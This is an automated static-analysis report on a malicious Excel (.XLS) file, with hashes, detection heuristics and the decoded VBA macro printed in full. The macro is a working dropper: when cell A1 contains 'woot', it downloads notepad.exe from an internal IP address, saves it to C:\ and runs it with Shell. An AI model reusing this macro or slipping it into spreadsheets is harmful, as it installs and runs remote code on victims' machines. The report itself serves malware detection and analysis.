Malicious Office (OLE) / .XLS — malware analysis report

Static analysis result for SHA-256 bf48cbd23f0a7564…

Verdict: MALICIOUS
File type: Office (OLE) / .XLS
Size: 37.0 KB
Created: 2017-08-18 09:24:38
Authoring application: Microsoft Excel
First seen: 2026-06-06
MD5: 1a1fdf8acbd109b87c7ab37b326e3990
SHA-1: eefb92f76ea41bc6c6102d0df03074859015387c
SHA-256: bf48cbd23f0a7564611aa1ff8cf27400e16f97f97320265ee015e8a9f0ce2979
Risk Score: 242

Heuristics 6

  • ClamAV: Doc.Dropper.Agent-6412232-1 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Agent-6412232-1
  • VBA macros detected [medium, 3 related findings] (OLE_VBA_MACROS)
    Document contains VBA macro code
  • Potential Shell call in VBA [critical] (OLE_VBA_SHELL)
    Potential Shell call in VBA
    Matched line in script
            Shell (exefile)
  • VBA downloads and writes a file to disk [critical] (OLE_VBA_HTTP_DROP_EXEC)
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script
        myURL = WinHttpReq.ResponseBody
  • CreateObject call [high] (OLE_VBA_CREATEOBJ)
    CreateObject call
    Matched line in script
        Set WinHttpReq = CreateObject("Microsoft.XMLHTTP")
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://10.0.234.205:8000/notepad.exe (referenced by macro)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1451 bytes
SHA-256: df594e3080b38e934944341058a0d46182e9739ac244dac447ade7db33e29b20
First 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Sub test_macro()

End Sub

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Worksheet_Change(ByVal Target As Range)

If InStr(Range("A1"), "woot") Then

    Dim myURL As String
    myURL = "http://10.0.234.205:8000/notepad.exe"

    Dim WinHttpReq As Object
    Set WinHttpReq = CreateObject("Microsoft.XMLHTTP")
    WinHttpReq.Open "GET", myURL, False
    WinHttpReq.Send

    myURL = WinHttpReq.ResponseBody
    If WinHttpReq.Status = 200 Then
        Set oStream = CreateObject("ADODB.Stream")
        oStream.Open
        oStream.Type = 1
        oStream.Write WinHttpReq.ResponseBody
        oStream.SaveToFile ("C:\notepad.exe")
        oStream.Close
        exefile = "c:\notepad.exe"
        Shell (exefile)
    End If

End If


End Sub

Private Sub Worksheet_SelectionChange(ByVal Target As Range)

End Sub